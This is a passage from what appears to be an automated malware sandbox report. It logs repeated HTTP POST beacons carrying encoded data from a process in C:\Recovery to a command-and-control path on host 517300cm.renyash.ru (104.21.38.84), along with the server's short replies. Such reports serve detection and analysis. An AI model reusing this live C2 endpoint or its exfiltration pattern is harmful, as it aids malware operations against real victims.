38 32 0b 3d 12 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"17%<#V%""", B $/19_!/&2&'<;W"!]''_"Y0.Y2; #$"P&<R6!U>[5Y88.7(Y+)+Q"R%=+3X%1#=<?\&7(9+39##(X(:]082= \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49839	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:02.657037020 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:03.003639936 CET	1012	OUT	Data Raw: 50 54 5e 59 5d 42 55 56 59 58 51 54 5b 56 57 56 5f 5c 58 5d 52 5f 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^Y]BUVYXQT[VWV_\X]R_ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^=U)!<!>3[88 % *(">:&V=&<7Y+Y):'\"/Y.,
Jan 9, 2025 18:13:03.315458059 CET	1012	OUT	Data Raw: 50 54 5e 59 5d 42 55 56 59 58 51 54 5b 56 57 56 5f 5c 58 5d 52 5f 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^Y]BUVYXQT[VWV_\X]R_ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^=U)!<!>3[88 % *(">:&V=&<7Y+Y):'\"/Y.,
Jan 9, 2025 18:13:03.729819059 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.730001926 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.730204105 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:03.924843073 CET	1012	OUT	Data Raw: 50 54 5e 59 5d 42 55 56 59 58 51 54 5b 56 57 56 5f 5c 58 5d 52 5f 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^Y]BUVYXQT[VWV_\X]R_ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^=U)!<!>3[88 % *(">:&V=&<7Y+Y):'\"/Y.,
Jan 9, 2025 18:13:04.254898071 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dk9L%2F5OhM%2BcZJwrbNHjG8VVwcutcQ5L2x74ZzLyd9EQ1bblACTWO7BMF7sg%2FrQbsP8%2FdYJVSERXg3pBxa5GEYgJVyqbpmjztwOcpfvQPkvgsEoptzKnWUnWuz1xwS7MGyDaBwwag"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e428e0c7cae-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=35500&min_rtt=33864&rtt_var=15972&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=31092&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49845	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:04.379728079 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:04.737432957 CET	1012	OUT	Data Raw: 50 5f 5e 59 58 45 55 54 59 58 51 54 5b 56 57 52 5f 55 58 5b 52 5a 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^YXEUTYXQT[VWR_UX[RZZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_=]#2]=;84#+:V59%31&]7Z!?;+:'\"/Y.,
Jan 9, 2025 18:13:04.848082066 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:05.150727987 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AC7Psl0jgpSbrnu5PHkX89cRIVPeZW0iO575vfv841re0FC7o80tejlfjRop%2Fvqpy9PvPruNygNgSLAdFLHEd6te0xbS8%2BJ1NodzcOduuQU5C4szcyxaAgG65uBYh%2FB0LNip%2FDwu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e4d089b7280-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3267&min_rtt=1967&rtt_var=3338&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=118017&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49851	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:05.274606943 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:05.628025055 CET	1012	OUT	Data Raw: 55 57 5e 5f 58 43 55 5e 59 58 51 54 5b 5d 57 50 5f 55 58 54 52 52 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW^_XCU^YXQT[]WP_UXTRRZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_=7)3;[84 %>T5.621&'X7^<:'\"/Y.
Jan 9, 2025 18:13:05.747289896 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:05.994996071 CET	797	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAzJN972evl02pKacTX8KQvoN2Y%2BQw2qu3IfHIGCQy0ufYml40rHEsf1z0hem36kgHBvCAFG8F3WGLzYyznP8AwFYyTvYwyf4go1eBL5Ir0HTSYb1lBwABfoIsucW1E8h%2BMy3yuV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e52aa7cefa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4389&min_rtt=1979&rtt_var=5564&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=68654&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:06.087208033 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49857	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:06.207815886 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1000 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:06.565427065 CET	1000	OUT	Data Raw: 50 50 5b 5b 58 43 55 56 59 58 51 54 5b 55 57 55 5f 54 58 55 52 59 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PP[[XCUVYXQT[UWU_TXURYZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#+ %_!<&> /+"%#^= .5S13-W&!?#?'\"/Y.$
Jan 9, 2025 18:13:06.663371086 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:06.910797119 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2ByoEdwncMqTtbzQBLvN7egJxHQcZk1o8X4G23uXnAgMm1F%2F%2BXXjaxUBmlZ55Q%2FXhEbRLIKb%2B4u61kUB7o%2BuVFeshYdttdA%2FcIQimg7V1XWpuh1H2exRP8JCI4oNNiyOzutheFL0E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e586f214229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4304&min_rtt=1664&rtt_var=5904&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1325&delivery_rate=64080&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49863	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:07.041105032 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:07.393646955 CET	1012	OUT	Data Raw: 50 51 5e 59 58 49 55 50 59 58 51 54 5b 57 57 54 5f 54 58 5b 52 5b 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ^YXIUPYXQT[WWT_TX[R[ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_+0) ,]?3(/<"&<=V![%W& %8;4<8?:'\"/Y.(
Jan 9, 2025 18:13:07.656152964 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:07.920737028 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYdM1vTIkm9%2BmECQYVCnCezR4oxva2jfW1bw1SA0TLlLzf0Lta8bHmpXSDS7qiOxWQk4JbYfaRZTypctuZxWsm3DZY%2FeW4jW5JYCoyHgieprOu9c2MF5pSi8zZJs2e1hhmkG8g0T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e5e7a0443b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=34410&min_rtt=30489&rtt_var=19276&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=23601&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49870	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:08.054881096 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:08.409207106 CET	1012	OUT	Data Raw: 55 53 5e 5b 5d 47 50 54 59 58 51 54 5b 54 57 53 5f 52 58 5b 52 53 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: US^[]GPTYXQT[TWS_RX[RSZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z =.!,*>U+Y,[# =8!>=1 S1#_#,;+'\"/Y.$
Jan 9, 2025 18:13:08.665637970 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:08.910358906 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BngsDG1F5fjHTuG8iDD%2BRmm0POAULR8Y0IcMC4xSa46wVAUZ%2BidhBumysUoBtRCg4gswPjN49b0YRPYTQHQKM%2Bn81ymGejYrctgTAAg%2Bap7y9kO%2FtJUu6PSFfZpWtxbK%2FFWHqP4z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e64e8c68c30-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4290&min_rtt=1897&rtt_var=5499&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=69368&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49876	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:09.035320997 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49881	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:09.321495056 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:09.674895048 CET	1292	OUT	Data Raw: 55 55 5b 58 58 49 55 56 59 58 51 54 5b 51 57 54 5f 50 58 5c 52 5d 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[XXIUVYXQT[QWT_PX\R]ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)#^4/2?37Y88Z47>:$T >>& U1(?!?(:'\"/Y.0
Jan 9, 2025 18:13:09.766537905 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:10.012442112 CET	953	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FwIvdyUi0VoJyCQkeraEu2XP1CUhVXdfF5DMVaJMiW3cQ%2BTZqFJ9nO4bLSQh1V2RTqf0Uu2zukdP3Yx9XMU9CESsHiVrPG6qbm0uwzb%2BWw0Dips9Ktlr2rXh5lGlajwLznwYeHX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e6bcecd41a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=2033&rtt_var=891&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=718150&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 15 26 43 23 1c 25 3c 27 1d 32 08 31 1c 22 1f 3d 05 3b 00 2b 1a 22 2a 38 01 3b 0c 26 02 35 2c 2f 5f 30 54 2d 57 26 3f 3f 56 21 1c 21 5d 01 12 27 06 25 2a 21 03 24 10 06 58 31 3b 20 1c 23 58 20 5f 27 05 39 08 24 30 3f 0a 36 5b 25 55 29 13 31 5c 2c 3f 0e 1b 3b 27 02 5b 28 13 2b 51 0e 10 21 0b 30 03 29 07 2b 00 3f 58 26 22 2b 0c 2a 3f 02 01 31 3c 3f 0a 2a 29 01 0d 25 3a 34 10 23 3f 2b 00 28 29 28 13 25 28 3d 50 3d 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!&C#%<'21"=;+"8;&5,/_0T-W&??V!!]'%!$X1; #X _'9$0?6[%U)1\,?;'[(+Q!0)+?X&"+?1<?)%:4#?+()(%(=P=8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49882	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:09.445003986 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:09.800045013 CET	1012	OUT	Data Raw: 50 50 5e 5e 5d 44 55 52 59 58 51 54 5b 51 57 56 5f 53 58 59 52 53 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PP^^]DURYXQT[QWV_SXYRSZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^)9_#2_>#;<7%$>9<U!-9R10>$;[#;^+*'\"/Y.0
Jan 9, 2025 18:13:09.933749914 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:10.311786890 CET	802	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lSrnnFInfNpETR3ILCgqmZTOsHXpsLe5yAryFLw10YyDLywzOKrjouIwU0RIKfyCsCySGPJt66AL5q%2BsHI47TnofU0v3a1JGrDgz6A0ZEWshel8IgeOxkRm50VxM5a9%2FQAMunTcM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e6cc93772b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5971&min_rtt=2699&rtt_var=7557&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=50554&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49888	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:10.444719076 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:10.799870014 CET	1012	OUT	Data Raw: 55 52 5e 5b 58 41 50 50 59 58 51 54 5b 5c 57 5d 5f 54 58 5b 52 53 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR^[XAPPYXQT[\W]_TX[RSZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z >#<"X3?]88"%>;6[61 -%+Z7,(:'\"/Y.
Jan 9, 2025 18:13:10.899282932 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:11.154808044 CET	797	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8D4t11UHU6Uy5oilIyYPqZFO55lKgGwVeUkw6VfHDAxwDqwoI1i%2F189SMcDtJ5xChPT83OZnaPeYSzdlgL2pLyyUrLHJaWgC2CJnmo63hsrLSYkmhfIAevB2Ns9WAuIGYHTv7mZz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e72dde572a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10366&min_rtt=4529&rtt_var=13373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=28500&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:11.241369963 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49895	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
